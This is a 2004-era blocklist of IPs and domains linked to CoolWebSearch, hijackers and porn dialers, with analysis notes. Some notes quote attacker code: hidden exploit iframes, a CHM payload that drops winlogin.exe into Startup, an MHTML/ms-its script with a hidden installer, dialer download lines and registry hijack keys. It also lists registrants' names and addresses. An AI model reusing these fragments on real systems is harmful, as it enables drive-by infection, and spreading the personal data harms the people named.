The following list is from http://www.webhelper4u.net
This is one of the first sites list I started dealing with CWS, hackers, hijackers, and those running exploits
***
new lop partner for secure software inc.
cyril, paciullo
105 place du college #8
longueuil, quebec 00 j4j-1-g3 ca

updated 11/3/2004
*************************************

38.113.3.122 punkass.com
38.113.193.6 n1.searchx.cc. 
38.113.198.80 fucking-machine.net
38.113.198.80 adasearch.com 
38.113.198.81 bdsm-inc.com called from bdsm-dialer.com
38.113.198.81 bdsm-inc.com
38.113.198.81 boys-group.com
38.113.198.81 boys-inc.com
38.113.198.81 cool-pantyhose.com
38.113.198.81 gays-club.com
38.113.198.81 gays-inc.com
38.113.198.81 get-gay.com
38.113.198.81 hentai-inc.com
38.113.198.81 illegalarea.com called in bdsm-inc.com
38.113.198.81 illegaldomain.com
38.113.198.81 lesbian-inc.404searchcom
38.113.198.81 mature-inc.com
38.113.198.81 matures-club.com
38.113.198.81 my-shemale.com
38.113.198.81 pantyhose-inc.com
38.113.198.81 pantyhose-now.com
38.113.198.81 pantyhose-site.com
38.113.198.81 pantynow.com
38.113.198.81 pics-land.com
38.113.198.81 pics-planetcom
38.113.198.81 pissing-inc.com
38.113.198.81 pissing-site.com
38.113.198.81 porno-center.com
38.113.198.81 porno-inc.com
38.113.198.81 real-pissing.com
38.113.198.81 super-gays.com
38.113.198.81 teen-now.com
38.113.198.81 teens-castle.com
38.113.198.81 teens-group.com
38.113.198.81 the-anime.com
38.113.198.81 the-bdsm.com
38.113.198.81 the-hentai.com
38.113.198.81 the-panty.com
38.113.198.81 the-pissing.com
38.113.198.81 the-thumbs.com
38.113.198.81 the-tranny.com
38.113.198.81 the-upskirt.com
38.113.198.81 thumbs-inc.com
38.113.198.81 thumbs-land.com
38.113.198.81 thumbsweb.com
38.113.198.81 upskirt-inc.com
38.113.198.81 voyeur-group.com
38.113.198.81 voyeur-inc.com
38.113.198.81 x-panty.com
38.113.198.81 x-pissing.com
38.113.198.81 x-tranny.com
38.113.198.81 x-upskirt.com
38.113.198.81 xxx-pissing.com
38.113.198.81 your-gay.com
38.113.198.81 yourlesbian.com
38.113.198.81 yourshemale.com
38.113.198.176 searchfind.info (results go to searchfeed.com:216.12.144.21)
(christala circliariwith code found in pansion.cz69.31.86.240)
38.113.198.235 searchmeup.com umaxsearch ltd 
38.113.198.252 re-partners.biz
38.113.198.252 cash.pornocruto.nu
38.113.198.252 pornocruto.nu
38.113.199.63 lickitquick.com 
38.113.204.40 coolmature.net izumov juriy vladimirovich links to 05p.com
38.113.204.182 searchpage.cc (alexey volgoff same as nkvd.us, smart-finder.biz)
38.117.144.30 icansearch.net (tetsuzo iwawaki support@searchv.com 81.222.131.50)
38.117.144.50 find-itnow.com 
38.117.144.51 just.find-itnow.com (uses searchmeup.com that results with 
66.230.164.182/click.php links)

38.117.144.162 008i.com (yohansen, olaf support@searchv.com 81.222.131.50)
38.117.144.162 8ad.com (pavel petroff calls coolwebsearch)
38.117.144.162 ad25.com (pavel petroff calls coolwebsearch)
38.117.144.162 ad45.com (pavel petroff calls coolwebsearch) 
38.117.144.162 ad77.com (pavel petroff calls coolwebsearch)
38.117.144.162 ad86.com (pavel petroff calls coolwebsearch)
38.117.144.162 go-all.com
38.117.144.162 go-advertising.com
38.117.144.162 go-acct.com
38.117.144.162 get-faster.com
38.117.144.162 get-data.net
38.117.144.162 get-certified.net
38.117.144.162 000info.com
38.117.144.162 6o9.com
38.117.144.162 0-days.net
38.117.144.162 0-29.com
38.117.144.162 0-2u.com
38.117.144.162 75tz.com
38.117.144.162 winlink.biz
38.117.144.162 winshow.biz 

61.152.242.111 smarttrade.allyes.com (has links in links in 209.66.114.129 
search-company.com)
38.117.144.162 get-access.com
62.65.252.93 smartdns.org
62.65.252.93 outhost.info
62.65.252.226 ssl4all.com 
62.65.252.226 host2010.com
62.129.133.193 mtreexxx.nl
63.160.243.7 browse.ifriends.net (accessed from greg-search.com 69.31.85.151 exploits)
63.217.29.115 connect.online-dialer.com (in pansion.cz:69.31.86.240 site page installs the cax.cab porn dialer clsid:02c20140-76f8-4763-83d5-b660107b7a90)
63.219.176.203 installs rdgus1115.exe porn dialer 
63.219.181.7	cax.cab
63.219.181.10 online-dialer.com (haldex ltd gibraltar)(also in the transponders 
twaintech.ini file)
63.246.146.142 damcash.com part of 194.85.34.200 damhost.com (andrey smirnov)
63.246.146.147 gate.damcash.com (part of a payment area to launch porn sites)
63.251.83.54 bdsm-dialer.com
64.7.197.6 nastydollars.com
64.7.207.118 clicks.nastydollars.com
64.7.209.58 mikesapartment.com
64.7.209.58 welivetogether.com
64.7.212.98 gxb.nastydollars.com
64.38.226.6 maxcash.com
64.38.226.6 maximumcash.com
64.124.210.76 hightcalldialer.com
64.124.210.98 umaxsearch.com contact icq: 7656497 email: umaxsearch@yahoo.com
people.icq.com/whitepages/about_me/1,,,00.html?to=%25u&uin=7656497
contact for susport is sesupport.com 

64.124.210.111 umaxlogin com https://umaxlogin.com/user_login.php this is the 
64.124.210.124
affiliate signup site.
64.125.84.23 searchfind.com
64.127.104.144 works with 213.159.117.133
64.154.5.9 free.wegcash.com
64.154.5.38 wegcash.com
64.157.143.86	findwhatevernow.com (findwhatevernow.com/searchband/) 
net think media sl
marbella, not applicable 2960 es
code calls search.findwhatevernow.com:212.72.51.77
  
64.185.230.223 sweatysmut.com steven sysak texas/links with easy-gals.net
64.186.129.250 softwareoutfit.com
64.186.129.252 mp3u.com
64.186.152.83 locator.imagesrvr.com
64.202.167.129 alhimik.com
64.237.37.152 userlands.com robert anderssen/links with easy-gals.net
64.237.39.70 clickzs.com (monitor website traffic)
64.237.39.76 cz6.clickzs.com (called in nudityforfree.com 207.246.158.17 and calls 
clickzs.com 64.237.39.70)
64.237.39.77 cz7.clickzs.com
64.237.39.80 vip.clickzs.com
64.237.44.247 thumberland.com
64.237.47.210 xxx-goto.net (in the devilsfuck.com 69.31.79.178 chm exploit)
(support@ssl4all.com)
registrant:
matlock business corp.
orlando barrio frago (matlockbuscorp@yahoo.com)
matlock business corp., 8391 beverly blvd., pmb. 700
los angeles
california,ca 90048

svalbase.sval.sailor.xxx-goto.net calls pink-stream.com
do a whois and get "pink-stream.com is not registered by us"
try xxx-goto.net and get in the page: lefun.de 212.40.165.87
64.237.53.3 therealsearch.com
64.237.53.4 cash4toolbar.com
64.237.53.4 msupdater.com
64.237.53.4 msupdater.net 
64.237.53.4 msupdater.org 
64.237.53.4 searchmyrequest.com
64.237.53.4 searchmiracle.com 
(searchmiracle.com/cab/v2cab.cab v2.dll elitebar searchmiracle.com/cab backdoor
searchmiracle.com/silent.exe )


64.237.56.64 adamsupportgroup.org (chipmunk322040inc)
64.237.57.37 showebway.com (sergey kryukov/ support email sesupport.com)
64.237.57.92  erolux.com
64.237.57.92  sex.erolux.com calls sex.erolux.com/index5.html

terry jenkins
36, dallington rd
northampton northamptonshire nn5 7bg gb

64.237.57.202	tonsporn.com

64.237.57.205 webcounter.cc
64.237.57.215	gallerytaboo.com 
dudack warren(axistek@yahoo.com)
14 girard avenue farmington,06032 us tel. +1.8606774504
gallerytaboo.com/site/mature.html
calls chm exploit thru 64.237.57.215 wofldsex.com

64.237.57.215 wofldsex.com
oliver gassner        (dmchome@mail.ru)
p.l. takstraat 12 amsterdam,1070 ljnl



**************
64.246.18.41 little-lady.net coolwebsearch affiliate
64.246.40.84	axistek.com
64.246.40.84	free32.com  
(vladislav vyazovik st.-petersburg ru. calls a pop chm exploit)
64.250.235.140 thoughtconvergence.com part of seek2.com that also runs dialers
64.255.161.101	interneteraser.com

65.39.191.71 thesexmail.com sex mail(called in nudityforfree.com 207.246.158.17)
65.75.161.13 jpeghunter.com
65.75.175.64 xxx3x.com links with xxxtoolbar
65.75.187.94 lovely-mature.com
65.77.129.178 galleries.thematurehardcore.com (called from pansion.cz after the chm 
exploit is ran)
65.77.129.212 xxxmovielinks.net (gennadi volokitin canada)
**
65.110.40.189 ptssa.net
ptssa.net/loader/invisidi.cab
ptssa.net/loader/cs-0067792227.exe
ptssa.net/loader/bhomod.dll
**
dawn of time, inc.
1306 w. craig rd, suite #e 293
las vegas, nv 89032

65.115.110.251	search.search-exe.com
appears in a hijackthis log that was over taken by wallace sandford's ftp o.bat exploit
eforum.idg.se/viewmsg.asp?entriesid=629409#630729

65.115.110.251	123-search.net
65.115.110.251	353-fjusj-fd5mfjw-jw-8463287-8gjd878-7x-0qq0.com
65.115.110.251	4545kj-dfdf4-586hkc53-215864jjf-n6my0w14a8.com
65.115.110.251	75ghs987lmciqogn0387jfmshs73m398e84n438dn3.com
65.115.110.251	867ktnshb-5309-ht047nbut0-48jtmdsl-7200jrtnids.com
65.115.110.251	click2media.net
65.115.110.251	media-search.net
65.115.110.251	scourweb.net
65.115.110.251	search-assist.net
65.115.110.251	search-exe.com
65.115.110.251	searchduckie.net
65.115.110.251	searchenhancement.com
65.115.110.251	searchnetworks.net
65.115.110.251	sidebarsearch.com
65.115.110.251	windowenhancer.com

66.28.176.138 galleries.mpegstation.com (by way of hardcoreover.com)
66.28.176.154 mpegstation.com
66.40.28.3  99livecam.com  vedeneev, vladimir paphos, cyprus
page code: 99livecam.com/livesexdaru/main/wm.htm 
webmaster mail to (dedmazai @ 99livecam.com)
66.40.28.12 dedmazai.com (greg-search.com exploits and main point for other exploits and 
xxxtoolbar installs)
66.40.28.51 porn-mix.com (called in greg-search.com/g7/ exploits
66.40.28.61 toprefsys.com ladimir vedeneev email : drvvv @ 99livecam.com
saint petersburg ru
66.45.237.99	minisearch.startnow.com  calls calls 204.181.57.152 findwhat.com
66.45.237.99	startnow.com
66.55.128.76	galleries.allinternal.com
66.55.134.98	xxxdirtylist.com

66.55.136.82 :
ip address: 66.55.136.82
host name: cx.linklist.cc

alias:
66.55.136.82.gigabits.us

66.55.136.84 linklist.cc (galina charmandjieva )
66.55.136.87 n3.searchx.cc.
66.55.136.93 th.msie.cc (part of linklist.cc)
***************************************
66.55.139.28 0calories.net (vitaliy korshinskiy)
66.55.139.29 1-domains-registrations.com (vitaliy korshinskiy)
66.55.141.3 looksa.com (links to coolwebsearch ip and searchfeed.com)
66.70.68.147 turbofind.com (standardinternet.com)

**********************************
66.79.171.70
scumware-remover.org
1800comtacts.com
1800flowres.com
1800flpwers.com
1800ptemeds.com
1800wheelchiar.com
1899contacts.com
1899flowers.com
8100flowers.com
aaska.com
akza.com
allpornonline.com
alongtheweb.com
altavissa.com
altavistaz.com
brookeberke.com
casinoww.com
casiuno.com
chicagoadultwebmasters.com
cmoedycentral.com
contactd.com
dxcite.com
emninem.com
epornpalace.com
examaner.com
fgambling.com
flowirs.com
gambleng.com
gambvling.com
gamvbling.com
garytherat.com
gfambling.com
girlsgpnewild.com
gmambling.com
gmames.com
goghle.com
gogll.com
goglw.com
gojle.com
googewl.com
googg.com
google-wealth.com
googlegreen.com
googleq.com
googleye.com
googllee.com
googwel.com
goooglr.com
gr8freesex.com
gyay.com
hapasol.com
htosex.com
infosace.com
insorance.com
iorkut.com
jeesuschrist.com
latinna.com
lnoan.com
martchmaker.com
masetrcard.com
matcjh.com
mnastercard.com
mrgfy.com
oirkut.com
oiwon.com
oonnee.com
orklut.com
orlkut.com
ortkut.com
otkut.com
otrkut.com
petsmrat.com
pokerroomn.com
pophotmail.com
pornss.com
pushpills.com
qqqgoogle.com
regsister.com
rokut.com
ruaders.com
scumware-remover.org.
sergeoprano.com
sexdood.com
sexyhigh.com
sexzx.com
shinycash.com
siperbowl.com
siuperbowl.com
smartestsearch.net
sperbowl.com
suiperbowl.com
syperbowl.com
theamd.com
tiwnks.com
vwvww.com
whutehouse.com
worldseres.com
worrldcup.com
wwedivaz.com
wwwegoogle.com
wwwgogl.com
wwwwmicrosoft.com
yaaoho.com
yahk.com
yahooom.com
zoomchat.com

66.79.171.75  smartestsearch.com (called from scumware-remover.org )
66.79.171.75  h-c-t.com
steven burritt
239 millcreek lane
naperville, illinois 60540 united states
************************************************
66.79.183.140 66.79.183.140
66.79.189.120	do-jaja.com (milos stoiljkovic medvedja,serbia yu)calls searchmeup.com
66.79.191.231 znext.com (asher nahmias group)
66.79.191.231 hotsearchbox.com (asher nahmias group)
66.79.191.231 hotpopup.com (asher nahmias group)
66.79.191.231 searchxl.com (asher nahmias group)
66.79.191.231 tinybar.com (asher nahmias group)
66.79.191.231 i--search.com (asher nahmias group calls searchxl.com)
also runs a search from coment systems : search.starware.com:64.94.162.226

*********
hijacks with *.reg files:
[hkey_current_user\software\microsoft\internet explorer\main]"search 
page"="hxxp://hotsearchbox.com/search.htm""search 
bar"="hxxp://hotsearchbox.com/search.htm"[hkey_local_machine\software\microsoft\inter
net explorer\search]
"searchassistant"="hxxp://hotsearchbox.com/search.htm
********

66.79.191.231 jethomepage.com (asher nahmias group)
66.79.191.231 jetseeker.com (asher nahmias group)
66.79.191.231 topsearcher.com (asher nahmias group)
66.79.191.231 allcybersearch.com (asher nahmias of zeropopup.com)
66.98.194.89 66.98.194.89/adrevenue/index.php
66.98.242.18 search-casino.com
*****************************
bruggenet 71 lakeview drive  suite 398
gibbsboro, nj 09026

66.115.136.242 achtungachtung.com (part of passthison.com exploits) 
66.115.136.242	eselmann.com  (exploits bloodhound trojan runs a byte verify counter.class)
66.115.136.242	clickenzer.com
66.115.136.242	reinigungfrau.com
***************************
66.115.142.126 offendale.com
66.115.184.78 karupspc.com
66.117.18.120 adultcash.com
66.117.16.121 home.adultcash.com
66.117.16.122 ads.adultcash.com
66.118.165.200 yellow500.com (pskov ru see go2-search.com)
66.118.176.25 hqstorm.com (linked with greg-search.com 69.31.85.151 and 05p.com )
66.132.171.152 name15.com (ab@ssl4all.com 62.65.252.226)
66.150.193.112 mt-download.com (clickspring, llc mediatickets)
66.150.1 freeezinebucks.com
***********************************
66.197.157.37 e-finder.cc (search results calls fast-look.com )

using encoded url address in dll files of 31kb as of 11/20/2004
jrc group  (abuse@efinder.cc)   
5 marigold st
south morang, none  3752 au        
9366 8173
code in page calls fast-look.com
base target='_main' href="hxxp://fast-look.com
***************************************
66.197.157.37 fast-look.com (search links goes thru swift-look.com:209.25.147.9)

** 
66.220.17.157/search/search.cgi
66.220.17.200 allaboutsearching.com (lop.com)
66.220.17.201 (lop.com)
66.220.17.202 (lop.com)
66.220.17.203 (lop.com)
66.220.17.204 (lop.com)
66.220.17.205 (lop.com)
** 
66.230.129.74 isprime.com dns server
66.230.140.69	dialerplatform.com has rdgus1115.exe from 63.219.176.203
66.230.144.6 trafficjuicer.com
**
66.230.145.49 66.230.145.49/gt.html
66.230.151.34 redpersonals.com
66.230.164.180 page states "no site is configured on this address" but code in their 
files show the following:
66.230.164.180/jsclick.php 
66.230.164.182 66.230.164.182/click.php
66.230.164.98/umaxsearch.com/search.php?aid=1&q= (see 64.124.210.98 above)
this is probably their main site for affiliates!!!!
**
66.230.164.190 lookfindgo.com (isprime, inc. )
66.230.164.198 passiongalleries.com (mw net media)
66.230.164.198 searchgalleries.com (isprime, inc. )
66.230.164.248 sesupport.com (pojan rousov)
66.230.167.218 ruworld.com
66.230.167.225 05p.com
noname
lelina st. 9-78
tbilisi, none 532458  ge

66.230.167.225	gals-post.com
66.230.167.225	galsteam.com
66.230.167.225	galsteen.com
66.230.167.225	mgpointer.com
66.230.167.225	oldmummy.com
66.230.167.225	shotboy.com
66.230.167.225	spyfan.com


66.230.169.2 marketbanker.com
66.230.172.113 66.230.172.113.click.php
66.250.55.108 defaultsearching.com (search calls 38.113.198.235 searchmeup.com 
umaxsearch ltd )

***************************
hyperspace communications inc (coolwebsearch)


66.250.74.150 coolwebsearch.com 
66.250.74.80 jonas.coolfreepages.com 
66.250.74.80 starwars.coolfreepages.com 
66.250.74.79 coolfreepages.com 
66.250.74.79 iwebland.com 
66.250.74.79 ww2.iwebland.com 
66.250.74.79 xc4va.iwebland.com 
66.250.74.75 hotfreebies.com 
66.250.74.71 (site unknown)
66.250.74.70 freemoney.dirtyhosting.com 
66.250.74.70 freefresh.dirtyhosting.com 
66.250.74.69 coolamateursite.com 
66.250.74.69 coolfreehost.com 
66.250.74.69 coolhardcoresite.com 
66.250.74.69 dirtyhosting.com 
66.250.74.69 coolpaysite.com 
66.250.74.45 iweb-commerce.com 
66.250.74.20 maximumhost.com (colocation services)
66.250.74.4 rosexxxgarden.com 
66.250.74.3 russiankiss.com
66.250.107.51 netcathost.com (part of the searchx.cc below)
66.250.130.194 66.250.130.194/mail.htm (called from here4search.com 69.31.80.129 and 
calls kitasearch.com 69.31.85.152)
66.250.130.194 allcrazyporn.com (prague, cz installs xxxtoolbar also calls 
xxx3x.com/tgp/)
66.250.130.196  spyorgy.net another gre-search partner with exploits
avdeiko, stanislav prague, cz 

66.250.130.201 thestas.com 
66.250.131.20 approvedlinks.com (calls windowws.cc/hp.htm 69.31.85.154)
66.250.170.66 mostsexygirls.com 
66.250.172.51 freehomepages.com
66.250.172.82 banner2.inet-traffic.com
66.250.172.106 inet-traffic.com
66.250.172.151 searchit.com
66.250.175.55 delivery.inet-traffic.com
(links to coolwebsearch.com and calls install.xxxtoolbar.com:216.127.33.119)

*************************

67.15.42.34 mymaydayinc.com
67.15.42.45 ne-ebu.com
67.15.52.40 ntsearch.com  (zao gator st-petersburg, spb 193241 ru)
calls the free32.com /pop . chm exploit)
ntsearch.com/zon.html will call code that will activate the mhtmlredir.exploit
this threat contains specially-crafted, html code that can download and execute programs without prompting you. this threat only affects microsoft internet explorer
when visiting a web page or receiving an html email that contains this threat, a file can be downloaded and executed. under normal conditions, internet explorer would prompt you before allowing any executable content to be downloaded and executed on the system. this vulnerability in internet explorer allows specially crafted html to bypass this security prompt.
see: microsoft.com/technet/security/bulletin/ms04-013.mspx

67.18.129.75  67.18.129.75/connect.cgi?id=1351 calls rdgus1351.exe porn dialer
67.19.51.4    67.19.51.4/content (is in the seksdialer.exe code) takes you to porn movies
67.19.51.10   67.19.51.10/enter/access2.asp is really 88kb seksdialer.exe
67.19.81.203  handicaphelp.cz loads wwwfinder.net
67.19.166.177 amicodiieri.it peddles intergrated technology istbar and changes home page to wwwfinder.net:63.208.158.126
67.72.101.20 clean-hosted-galleries.com
**
67.117.124.225  mega.directsearch.net in rundlg32.dll code..
67.117.124.225  directsearch.net
craig praizler  cpraivler@vsuchico.edu
1270 dale way chico, ca 95926 us 
**
69.1.72.102 theincest.com
69.22.151.97 virginz.info
69.22.158.29 trygames.com
69.26.170.37 deardrocher.com (deardrocher.com/dialers/ ) calls seek2.com:69.26.170.37
69.26.170.37  seek2.com copy right: thoughtconvergence.com 64.250.235.140
69.31.76.67	mypoiskovik.com
69.31.79.100 69.31.79.100/winsearchie32.chm : : / winsearchie32.exe 
chm dialer exploit calls 69.50.170.212/connect.cgi
clsid:11111111-1111-1111-1111-111111111237" codebase="1/dexgb190.exe
**
69.31.79.146 pizdato.biz chm exploit and byteverify
pizdato.biz/acc33/counter.htm is on a page:
<iframe src="exploit.htm" width=0 border=0 height=0></iframe>
<iframe height="1" width="1" src="fuck.htm"></iframe>
<iframe height="1" width="1" src="new/index.html"></iframe>

pizdato.biz/acc33/fuck.htm decodes a script
pizdato.biz/acc33/exploit.htm runs the /exploit.chm

*******************************
notepad.com and chm exploit
*******************************
69.31.79.178 devilsfuck.com (cfbfae00-17a6-11d0-99cb-00c04fd64497 using notepad.com)
denis kuznezov ru, support@ssl4all.com)
target.chm chm exploit..links to porn site it owns: saintsex.com:216.195.34.195)
this one : mailto class clsid {fde3577a-6254-181c-4e11-339e4f746bd3}
devilsfuck.com/enter.htm (code found in its page)
svalbase.sval.sailor.xxx-goto.net:64.237.47.210
69.31.79.178 cutegirlsporn.com



******************************
69.31.80.114 thru 69.31.85.152 runs the notepad and wmplayer exploit from script on 
greg-search.com, 00k8.com, and others
******************************
69.31.80.114 hardcoreover.com (hardcoreover.com/main.htm) this first sets a cookie with 
the code for starting an byteverify trojan exploit with code to: 
hxxp://solongas.com/hp.htm?id=9|hxxp://solongas.com/sp.htm?id=9
next it calls href="/cgi-bin/fet/out.cgi?link=deleteme. this calls (nudityforfree.com 
207.246.158.17)



69.31.80.128 solongas.com
69.31.80.129 here4search.com (khudoleev, denis prague, cz )
69.31.80.129 nativehardcore.com (mazay ltd prague, cz )
69.31.80.226 mature-sex-live.com (sub1@pisem.net see 80.68.244.5)
69.31.85.146 mig29here.com (magel, irgi zoro_ru@hotmail.com)
69.31.85.146 webanalsex.com
69.31.85.146 gotosex4all.com
69.31.85.147 cc20foreva.com (magel, irgi zoro_ru@hotmail.com)
69.31.85.148 t34rulit.com (magel, irgi zoro_ru@hotmail.com)
69.31.85.151 greg-search.com (calls umaxlogin.com/user_signup.php?referer=mazai3)
69.31.85.151 teenpyramid.com
69.31.85.151 69.31.85.151/g7/  more greg-search exploits
69.31.85.152 kitasearch.com (support links to here4search.com)
69.31.85.154 windowws.cc (called in approvedlinks.com 66.250.131.20 and calls 
here4search.com/hp.htm 69.31.80.129 which then calls 296f8.ilxt.info/index.php where 
ilxt.info results in ip: 127.0.0.1)

69.31.86.84 hostssp.com (black wood s.r.o)
69.31.86.85 www666 hostssp.com (calls pansion.cz then runs a wmp exploit and opens to 
coolwebsearch.org and then runs searchmeup.cc/seba/install.htm (195.190.118.157). also 
has coolwebsearch.com links)
69.31.86.87 rape-cool-video.com (fedorov, vadim sp@prague-sex.com)
69.31.86.139 yourbookmarks.info (alex dmitriev)

69.31.86.147 datasearch.info (pupkin v.v./ru email)
69.31.86.220 aboutclicker.com
69.31.86.221 69.31.86.221/se.php also called from search-biz.cc
and then links to coolwebsearch.com
69.31.86.221/ passes thru coolwebsearch.com and re-directs to the advertisers links.
69.31.86.221/xltmk.dat 65kb (has the following neond.com in its code)
best award holdings ltd. 
unit 4, 20/f, ho lik centre, 66a sha tsui road, tsuen wan,
hk, hk na
69.31.86.223 called from (search-web.cc, 81.211.105.64 )
69.31.86.226 (redirects to xxxmovielinks.net 65.77.129.212) 
69.31.86.240 adult-friends-finder.net (vadim fedorov) 
69.31.86.240 chinaexpressjidla.com (opens to coolwebsearch.info and installs xxxtoolbar 
and mediatickets)
69.31.86.240 sebastacz.com (69.31.86.240 pansion.cz)
69.31.86.240 sebasta210.sebastacz.com (69.31.86.240 pansion.cz)
69.31.86.240 coolsearcher.info (vadim fedorov) 
(calls searchmeup.cc/delete.exe to uninstall home page)
69.31.86.240 prague-sex.com (fedorov, vadim hali@volny.cz)
69.31.86.240 prague-sex.biz ( vadim fedorov calls coolweb.com)
69.31.86.240 pansion.cz dns author in code is pansion.cz (rape-cool-video.com 69.31.86.87 
)
(author content="sebastano perero in pages meta code)
has: connect.online-dialer.com/connect.php?did=od-stnd110 in its page
which redirects to searchfind.info:38.113.198.176 and is registered to christala 
circliari haldex.com but this one is in new york.

69.31.86.240 coolwebsearch.org (vadim fedorov)


69.31.87.128 about-blank.biz (see 69.31.86.220)
69.31.87.209 cx.linklist.cc
69.31.87.243 05p.com 

code contains:
**
69.31.87.244 7days.ws harry bromel yellow500.com
38.113.204.40 coolmature.net izumov juriy vladimirovich
66.118.176.25 hqstorm.com vadim kravciuk
69.31.87.243 easy-gals.net pavel petroff 
69.31.87.243 galsteam.com pavel petroff
69.31.87.243 gals-post.com pavel petroff
69.31.87.243 mgpointer.com willy
69.31.87.243 galsteen.com pavel petroff
69.31.87.245 onlysex.ws harry bromel yellow500.com
69.31.87.246 xsex.ws harry bromel yellow500.com

(05p.com/tb/installs.html: install page for xxxtoolbar and mediatickets and flingstone 
bridge.dll)
**

69.50.131.86	zendmedia.com
69.50.131.86	ad1.zendmedia.com

69.50.139.61/hp1//hp1.exe
69.50.139.61/hp1//hp1.chm
69.50.139.61/hp1/hp1.htm 
**********************************
69.50.160.19	callbackgsm.biz 
(ben van/denbroek dm viscontilaan 181de, meern nl)

transmits to callbackgsm.biz/cmd.php?uid=&aid=[28489421891402917083]
drops: winnt or windows\system32 cmd.dat and cmdtm.dat.
2 registry entryies seem to keep recreating these files and transmitting when ie is opened.
[hkey_local_machine\system\controlset001\control]
impersonate"="[28489421891402917083]

[hkey_local_machine\system\controlset002\control]
impersonate"="[28489421891402917083]
removing these two reg keys and rebooting stopped the file recreations and the transmissions.
***
about blank hijacker for porn related sites.  uses hidden dll.

69.50.164.123  fastsearchweb.com
69.50.164.123  findspyware.net
69.50.164.123  msnagent.com
69.50.164.123  search-soft.net
69.50.164.123  v5msn.com

live chat
pawl udinov        
p.o.box 03-07-100 london

*********************************


69.50.170.18 easy-search.biz (alexandr ivanov/contact is 66.230.164.248 sesupport.com)
69.50.170.210 royalsearch.net ( fedor sumkin /support email sesupport.com)
69.50.170.212/connect.cgi called from 69.31.79.100
clsid:11111111-1111-1111-1111-111111111237" codebase="1/dexgb190.exe
69.50.170.212/dexgb190.exe
**
69.50.173.244 easy-search.net (alexey dronin/email punkass.com:38.113.3.122)
69.50.173.252 directwebsearch.net (kumar leo tartu)
69.50.173.252 gkn.directwebsearch.net
69.50.184.50 find4u.net (hbison.com)
69.50.184.50 dorkodrom.com (hbison.com / support email sesupport.com)
69.50.184.50 hbison.com
69.50.184.53 find4u.net/enter.htm (this has the chm exploit)
find4u.net//main.chm::/main.htm
s.saxxxvetoxxxfile("c:\\documents and settings\\all users\\start 
menu\\programs\\startup\\winlogin.exe
<applet archive="count1.jar" code="blackbox.class" width=1 height=1></applet>
calls up teocash.com also.
69.50.184.50	web-cams-chat.com
69.50.184.53	find4u.net\enter.htm
69.50.184.54	69.50.184.54/find4u/
69.50.184.55	getthis4free.com
69.50.184.228 600pics.com
69.50.177.100 installs the rdgus780.exe dialer and run the chm exploit winsearchie32.exe
69.50.187.110 rootsearch.biz (leah perry root search company hollis me)
some links to 81.9.3.77/click.php

69.50.187.194 find-online.net (links to teocash.com/coolwebsearch.com in faq)
69.50.187.202 moreporn.biz
69.50.187.219 vse-moe.biz
69.50.188.52	vv3.s1.topx.cc
69.50.188.82	creamedpussy.net
69.50.188.82	buldog-stats.com
69.50.188.82	buldog-search.com

69.50.189.114	jetsearch.org dmitry kuznetsov 
runs file.exe chm exploit clsid: {14a3221b-1678-1982-a355-7263b1281987}
and installs porn dialer: rdgus1115.exe clsid: {1c4c6a15-2578-5e4e-41d8-40944d647f11}
from 63.219.176.203
**
69.50.191.51 autosearch.cc (michael cesarevsky/ svinson@post.cz)
69.50.191.52 bestsearch.cc (michael cesarevsky/ svinson@post.cz)
69.50.191.66	xpehbam.biz (vasiliy pupklindtovich cocos (keeling) isl) installs load.exe
69.50.191.155	ez-finder.com
69.50.191.155	cannotfind.net (icommerce solutions s.a.)part of the rundlg32.dll code
69.50.191.155	yeahsearch.net
69.50.191.158	iwantsearch.com  (icommerce solutions s.a.)
(part of the code in rundlg32.dll that tries to be install from 206.161.125.149 after at find4u.net chm exploit url.
the iwantsearch.com code loads iwantsearch.com/view.html which search results then call 81.9.3.77/click.php another cws)
the rundlg32.dll clsid: 0e1230f8-ea50-42a9-983c-d22abc2eed3b is an adult search toolbar. 
69.50.191.158	searchservices.info

69.56.150.162 adultden.com
69.59.138.155 spykillerpro.com
69.56.176.78  installs: webplugin.cab
  
69.56.220.74  ehttp.cc calls ehttp.html and runs a install. reg 
****
hkey_local_machine\software\microsoft\windows\currentversion\url

hkey_local_machine\software\microsoft\windows\currentversion\url\defaultprefix
@="hxxp://ehttp.cc/?"

hkey_local_machine\software\microsoft\windows\currentversion\url\prefixes
www . ="hxxp://ehttp.cc/?
www = hxxp://ehttp.cc/?
*************************************************
69.56.224.58 maxxxhosters.com

69.64.32.196 acoolwebsearch.com (eric paugh calls coolwebsearch.com 66.250.74.150)
69.90.87.2 ftp downloads.default-homepage-network.com
69.90.178.11  public.windupdates.com 
69.93.22.122 enjoysearch.info (vadim fedorov)
69.93.22.122 coolnameserv.com
69.93.95.234  prolivation.com calls 64.237.57.92 erolux.com (erolux.com/index5.html)
the opens to sex.erolux.com/index5.html
fred smith
37 peartree avenue
southampton hampshire 

69.93.95.234  sexyque.com
vasia pupkin
pjatnenskij pr. 15, 118
st. petersburg st. petersburg 188322 ru

69.93.221.87 dmporn.com
********************************
80.68.244.5 fromru.com
80.68.244.5 pisem.net
80.68.244.5 mail333.com
*************************
81.9.3.75 inhost2.info
81.9.3.75 loliboard.inhost2.info
81.9.3.75 loliz.inhost2.info
81.9.3.77 81.9.3.77/click.php
81.9.3.82	countere.com
81.9.3.82	pukkasearch.net
81.9.3.82	realsearcher.com uses sysupport email
hikesi me
abdula j
tartu peapostkontor, pk. 12 tartu 



81.23.227.8 e-sexcash.com (installs stoutetienersnl.exe - bloodhound.packed trojan
d&d internet services - nl)
81.23.252.161 0190-dialer.com
81.211.105.20 looking-for.cc calls coolwebsearch.com pages also installs sfinstall.exe
smartfinder
81.211.105.21 (calls search-about.net)
81.211.105.23 ns2.realsearch.ws 
81.211.105.22 ns1.realsearch.ws
81.211.105.24 smart-finder biz
**
81.211.105.24 happy-new-year.biz
happy-new-year.biz/1524/hny.html

document.write("<textarea id='code' style='display:none;'><object data='ms- its : mhtml : 
file : // c:\\foo .mht !${path} / counter .chm: :/ counter.htm' 
type='text/x-scriptlet'></object></textarea>"); 
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.ind
exof('hny.html')))); document.write("<iframe src='installer.htm' 
style='display:none;'></iframe>"); } else { document.write("<applet 
archive='arc.jar' code='blackbox.class' width=1 height=1></applet><object 
data='counter.php'></object>"); } </script> hxxp://happy-new-year.biz/1524/arc.jar 
happy-new-year.biz/1524/blackbox.class
happy-new-year.biz/hny3.html
happy-new-year.biz/1524/blackbox.class
happy-new-year.biz/hny3.html
**
81.211.105.24 best-result.info 
81.211.105.24 best-search.info
81.211.105.24 bigbr.cc (calls start-page.info)
81.211.105.24 perfect-search.info 
81.211.105.24 search-smart.info
